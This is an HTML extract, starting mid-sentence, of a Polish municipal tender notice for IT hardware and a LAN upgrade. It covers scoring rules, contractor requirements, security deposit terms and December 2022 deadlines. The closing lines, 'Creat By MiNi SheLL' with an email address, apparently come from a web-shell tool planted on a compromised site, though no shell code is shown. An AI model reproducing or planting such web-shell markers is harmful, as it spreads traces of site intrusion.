niepodlegających odrzuceniu<br/>2 Okres gwarancji – waga 40 pkt., gdzie punkty wyliczane są wg następującego dodatkowego okresu gwarancji:<br/>Część 1 (G)<br/>• 12 miesięcy – 0 pkt.<br/>• 24 miesiące – 10 pkt.<br/>• 36 miesięcy – 40 pkt.<br/>Część 2 (G)<br/>• 36 miesięcy – 0 pkt.<br/>• 48 miesięcy – 10 pkt.<br/>• 60 miesięcy – 40 pkt.<br/>Część 3 – gwarancja na sprzęt (G1)<br/>• 36 miesięcy – 0 pkt.<br/>• 48 miesięcy – 10 pkt.<br/>• 60 miesięcy – 25 pkt.<br/>Część 3 gwarancja na sieć teleinformacyjną (G2)<br/>• 10 lat – 0 pkt.<br/>• 15 lat – 15 pkt.<br/>Liczba punktów określona zostanie dla części 1 i 2 na podstawie wzoru: P=C+G<br/>Liczba punktów określona zostanie dla części 3 na podstawie wzoru: P=C+G1+G2<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów<br/>spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu<br/>i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 P.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na sprzęt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na sieć teleinformacyjną</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej<br/>a) Zdolność techniczna<br/>dla części 1: Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>dla części 2: Warunek zostanie spełniony jeśli Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 3 (trzech) lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał: co<br/>najmniej 1 dostawę serwera wraz z konfiguracją o wartości min. 50.000,00 zł brutto<br/>dla części 3: Warunek zostanie spełniony jeśli Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 3 (trzech) lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał: co<br/>najmniej 1 dostawę sprzętu sieciowego z konfiguracją o wartości min. 20.000,00 zł brutto<br/>dla części 3: Warunek zostanie spełniony jeśli Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 3 (trzech) lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał: co<br/>najmniej 1 sieć teleinformatyczną o wartośco conajmiej 20,000 zł brutto<br/>b) Zdolność zawodowa:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez<br/>Zamawiającego oraz o braku podstaw do wykluczenia z postępowania, – zgodnie z Załącznikiem nr 8 do SWZ.<br/>Oświadczenie, o którym mowa w ust. 1 powyżej stanowi dowód potwierdzający spełnianie warunków udziału w postępowaniu oraz<br/>brak podstaw do wykluczenia z postępowania, odpowiednio na dzień składania ofert tymczasowo zastępujący wymagane przez<br/>Zamawiającego podmiotowe środki dowodowe.<br/>Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia braku podstaw wykluczenia z udziału w<br/>postępowaniu obejmują:<br/>1) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust.1 ustawy Pzp według<br/>wzoru zawartego w załączniku nr 14 do SWZ<br/>2) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 P.z.p., o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej - załącznik nr do 13 SWZ;<br/>3) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 P.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym<br/>przez Zamawiającego oraz o braku podstaw do wykluczenia z postępowania, – zgodnie z Załącznikiem nr 8 do SWZ.<br/>Oświadczenie, o którym mowa w ust. 1 powyżej stanowi dowód potwierdzający spełnianie warunków udziału w postępowaniu oraz<br/>brak podstaw do wykluczenia z postępowania, odpowiednio na dzień składania ofert tymczasowo zastępujący wymagane przez<br/>Zamawiającego podmiotowe środki dowodowe.<br/>Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu obejmują:<br/>1) wykaz dostaw zrealizowanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały<br/>zrealizowane, oraz załączeniem dowodów określających, czy te dostawy zostały zrealizowane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały zrealizowane<br/>należycie, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty; wzór wykazu stanowi Załącznik nr 9 do SWZ – Wykaz dostaw;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia podmiotowych środków dowodowych wraz z ofertą:<br/>1) Wykonawca ubiegający się o realizację części 1 zamówienia wraz z ofertą składa następujące środki przedmiotowe:<br/>• Deklaracja Zgodności z normą CE na oferowany sprzęt komputerowy, lub oświadczenie, że oferowany sprzęt<br/>komputerowy spełnia normy CE. Wykonawca może dostarczyć dokument na całość sprzętu komputerowego lub na każdy<br/>rodzaj sprzętu komputerowego oddzielnie.<br/>• Wyniki testów wydajności komputerów (zgodnie z wymaganiami Opisu Przedmiotu Zamówienia).<br/>• Oświadczenie, że w przypadku wystąpienia awarii dysku twardego w urządzeniu objętym aktywnym wparciem<br/>technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego.<br/>• Specyfikacja techniczna oferowanego sprzętu, umożliwiająca porównanie z minimalnymi parametrami technicznymi<br/>występującymi w Opisie przedmiotu zamówienia przedstawiona na odrębnie przygotowanym załączniku – Załącznik nr 5 do<br/>SWZ – Formularz techniczny do oferty część 1 „Dostawa komputerów osobistych AIO z oprogramowaniem – specyfikacja<br/>sprzętu”<br/>2) Wykonawca ubiegający się o realizację części 2 zamówienia wraz z ofertą składa następujące środki przedmiotowe:<br/>• Dokument potwierdzający wyprodukowanie serwera zgodnie z normą ISO-9001 oraz ISO-14001.<br/>• Oświadczenie, że w przypadku wystąpienia awarii dysku twardego w urządzeniu objętym aktywnym wparciem<br/>technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego (dotyczy serwera).<br/>• Oświadczenie Producenta potwierdzające, że Serwis urządzeń będzie realizowany bezpośrednio przez Producenta i/lub<br/>we współpracy z Autoryzowanym Partnerem Serwisowym Producenta (dotyczy serwera).<br/>• Oświadczenie producentów oferowanego serwera, potwierdzające pochodzenie urządzenia z oficjalnego kanału<br/>dystrybucyjnego producenta.<br/>• Wyniki testów wydajności serwera i komputera przenośnego (zgodnie z wymaganiami Opisu Przedmiotu Zamówienia).<br/>• Specyfikacja techniczna oferowanego sprzętu, umożliwiająca porównanie z minimalnymi parametrami technicznymi<br/>występującymi w Opisie przedmiotu zamówienia przedstawiona na odrębnie przygotowanym załączniku – Załącznik nr 6 do<br/>SWZ – Formularz techniczny do oferty część 2 „Dostawa serwera sieciowego wraz z konfiguracją, dostawa urządzenia NAS,<br/>dostawa UPS – specyfikacja sprzętu”<br/>3) Wykonawca ubiegający się o realizację części 3 zamówienia wraz z ofertą składa następujące środki przedmiotowe:<br/>• Dokument potwierdzający wyprodukowanie serwera zgodnie z normą ISO-9001 oraz ISO-14001.<br/>• Oświadczenie, że w przypadku wystąpienia awarii nośnika w urządzeniu objętym aktywnym wparciem technicznym,uszkodzony nośnik pozostaje u Zamawiającego.<br/>• Oświadczenie Producenta potwierdzające, że Serwis urządzeń będzie realizowany bezpośrednio przez Producenta i/lub<br/>we współpracy z Autoryzowanym Partnerem Serwisowym Producenta (dotyczy serwera).<br/>• Oświadczenie producentów oferowanego serwera, potwierdzające pochodzenie urządzenia z oficjalnego kanału<br/>dystrybucyjnego producenta.<br/>• Specyfikacja techniczna oferowanego sprzętu, umożliwiająca porównanie z minimalnymi parametrami technicznymi<br/>występującymi w Opisie przedmiotu zamówienia przedstawiona na odrębnie przygotowanym załączniku – Formularz<br/>techniczny do oferty część 3 „Dostawa urządzeń sieciowych wraz z konfiguracją oraz z modernizacja sieci LAN w urzędzie<br/>gminy” <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych:<br/>1) Dla części 1 zamówienia uzupełnieniu podlegają następujące środki przedmiotowe:<br/>• Deklaracja Zgodności z normą CE na oferowany sprzęt komputerowy, lub oświadczenie, że oferowany sprzęt<br/>komputerowy spełnia normy CE. Wykonawca może dostarczyć dokument na całość sprzętu komputerowego lub na każdy<br/>rodzaj sprzętu komputerowego oddzielnie.<br/>• Wyniki testów wydajności komputerów (zgodnie z wymaganiami Opisu Przedmiotu Zamówienia).<br/>2) Dla części 2 zamówienia uzupełnieniu podlegają następujące środki przedmiotowe:<br/>• Dokument potwierdzający wyprodukowanie serwera zgodnie z normą ISO-9001 oraz ISO-14001.<br/>• Oświadczenie, że w przypadku wystąpienia awarii dysku twardego w urządzeniu objętym aktywnym wparciem<br/>technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego .<br/>• Oświadczenie Producenta potwierdzające, że Serwis urządzeń będzie realizowany bezpośrednio przez Producenta i/lub<br/>we współpracy z Autoryzowanym Partnerem Serwisowym Producenta (dotyczy serwera).<br/>• Oświadczenie potwierdzające pochodzenie urządzenia z oficjalnego kanału dystrybucyjnego producenta.<br/>• Wyniki testów wydajności (zgodnie z wymaganiami Opisu Przedmiotu Zamówienia).<br/>3) Dla części 3 zamówienia uzupełnieniu podlegają następujące środki przedmiotowe:<br/>• Dokument potwierdzający wyprodukowanie serwera zgodnie z normą ISO-9001 oraz ISO-14001.<br/>• Oświadczenie, że w przypadku wystąpienia awarii nośnika pamięci/dysku twardego w urządzeniu objętym aktywnym<br/>wparciem technicznym, uszkodzony dysk twardy pozostaje u Zamawiającego.<br/>• Oświadczenie Producenta potwierdzające, że Serwis urządzeń będzie realizowany bezpośrednio przez Producenta i/lub<br/>we współpracy z Autoryzowanym Partnerem Serwisowym Producenta (dotyczy serwera).<br/>• Oświadczenie potwierdzające pochodzenie urządzenia z oficjalnego kanału dystrybucyjnego producenta. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zostały wskazane w SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Od wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, wymagane będzie wniesienie, przed zawarciem<br/>umowy, zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej (brutto) podanej w ofercie za<br/>wykonanie określonej części przedmiotu zamówienia. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub<br/>nienależytego wykonania umowy.<br/>2. Zabezpieczenie należytego wykonania umowy może być wnoszone według wyboru wykonawcy w jednej lub w kilku<br/>formach wskazanych w art. 450 ust. 1 ustawy P.z.p, tj.:<br/>- pieniądzu;<br/>- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy<br/>jest zawsze zobowiązaniem pieniężnym;<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach wskazanych w art. 450 ust. 2 ustawy P.z.p.<br/>4. Zamawiający nie wyraża zgody na tworzenie zabezpieczenia przez potrącenia z należności za częściowo wykonane<br/>świadczenia.<br/>5. Do zmiany formy zabezpieczenia w trakcie realizacji umowy stosuje się art. 451 ustawy P.z.p.<br/>6. Zamawiający zwróci zabezpieczenie w następujących terminach:<br/> 70% wysokości zabezpieczenia w terminie 30 dni od dnia podpisania protokołu odbioru końcowego przedmiot zamówienia, tj. od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane,<br/> 30% wysokości zabezpieczenia w terminie 15 dni od dnia, w którym upływa okres gwarancji liczony zgodnie z<br/>postanowieniami zawartej umowy.<br/>7. Zabezpieczenie wnoszone w pieniądzu powinno zostać wpłacone przelewem na rachunek bankowy zamawiającego w<br/>banku Mazovia Bank Spółdzielczy, nr rachunku 15 9197 0004 0000 1049 2000 0040, z dopiskiem „ZNW Cyfrowa Gmina”<br/>8. Zabezpieczenie wnoszone w formie innej niż w pieniądzu powinno być dostarczone, najpóźniej w dniu podpisania umowy<br/>– do chwili jej podpisania.<br/>Pozostałe wymagania określono w SW <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zostały określone we wzorze umowy/projektowane postanowienia umowy stanowiące załącznik nr 10 i 11 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy https://ezamowienia.gov.p</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com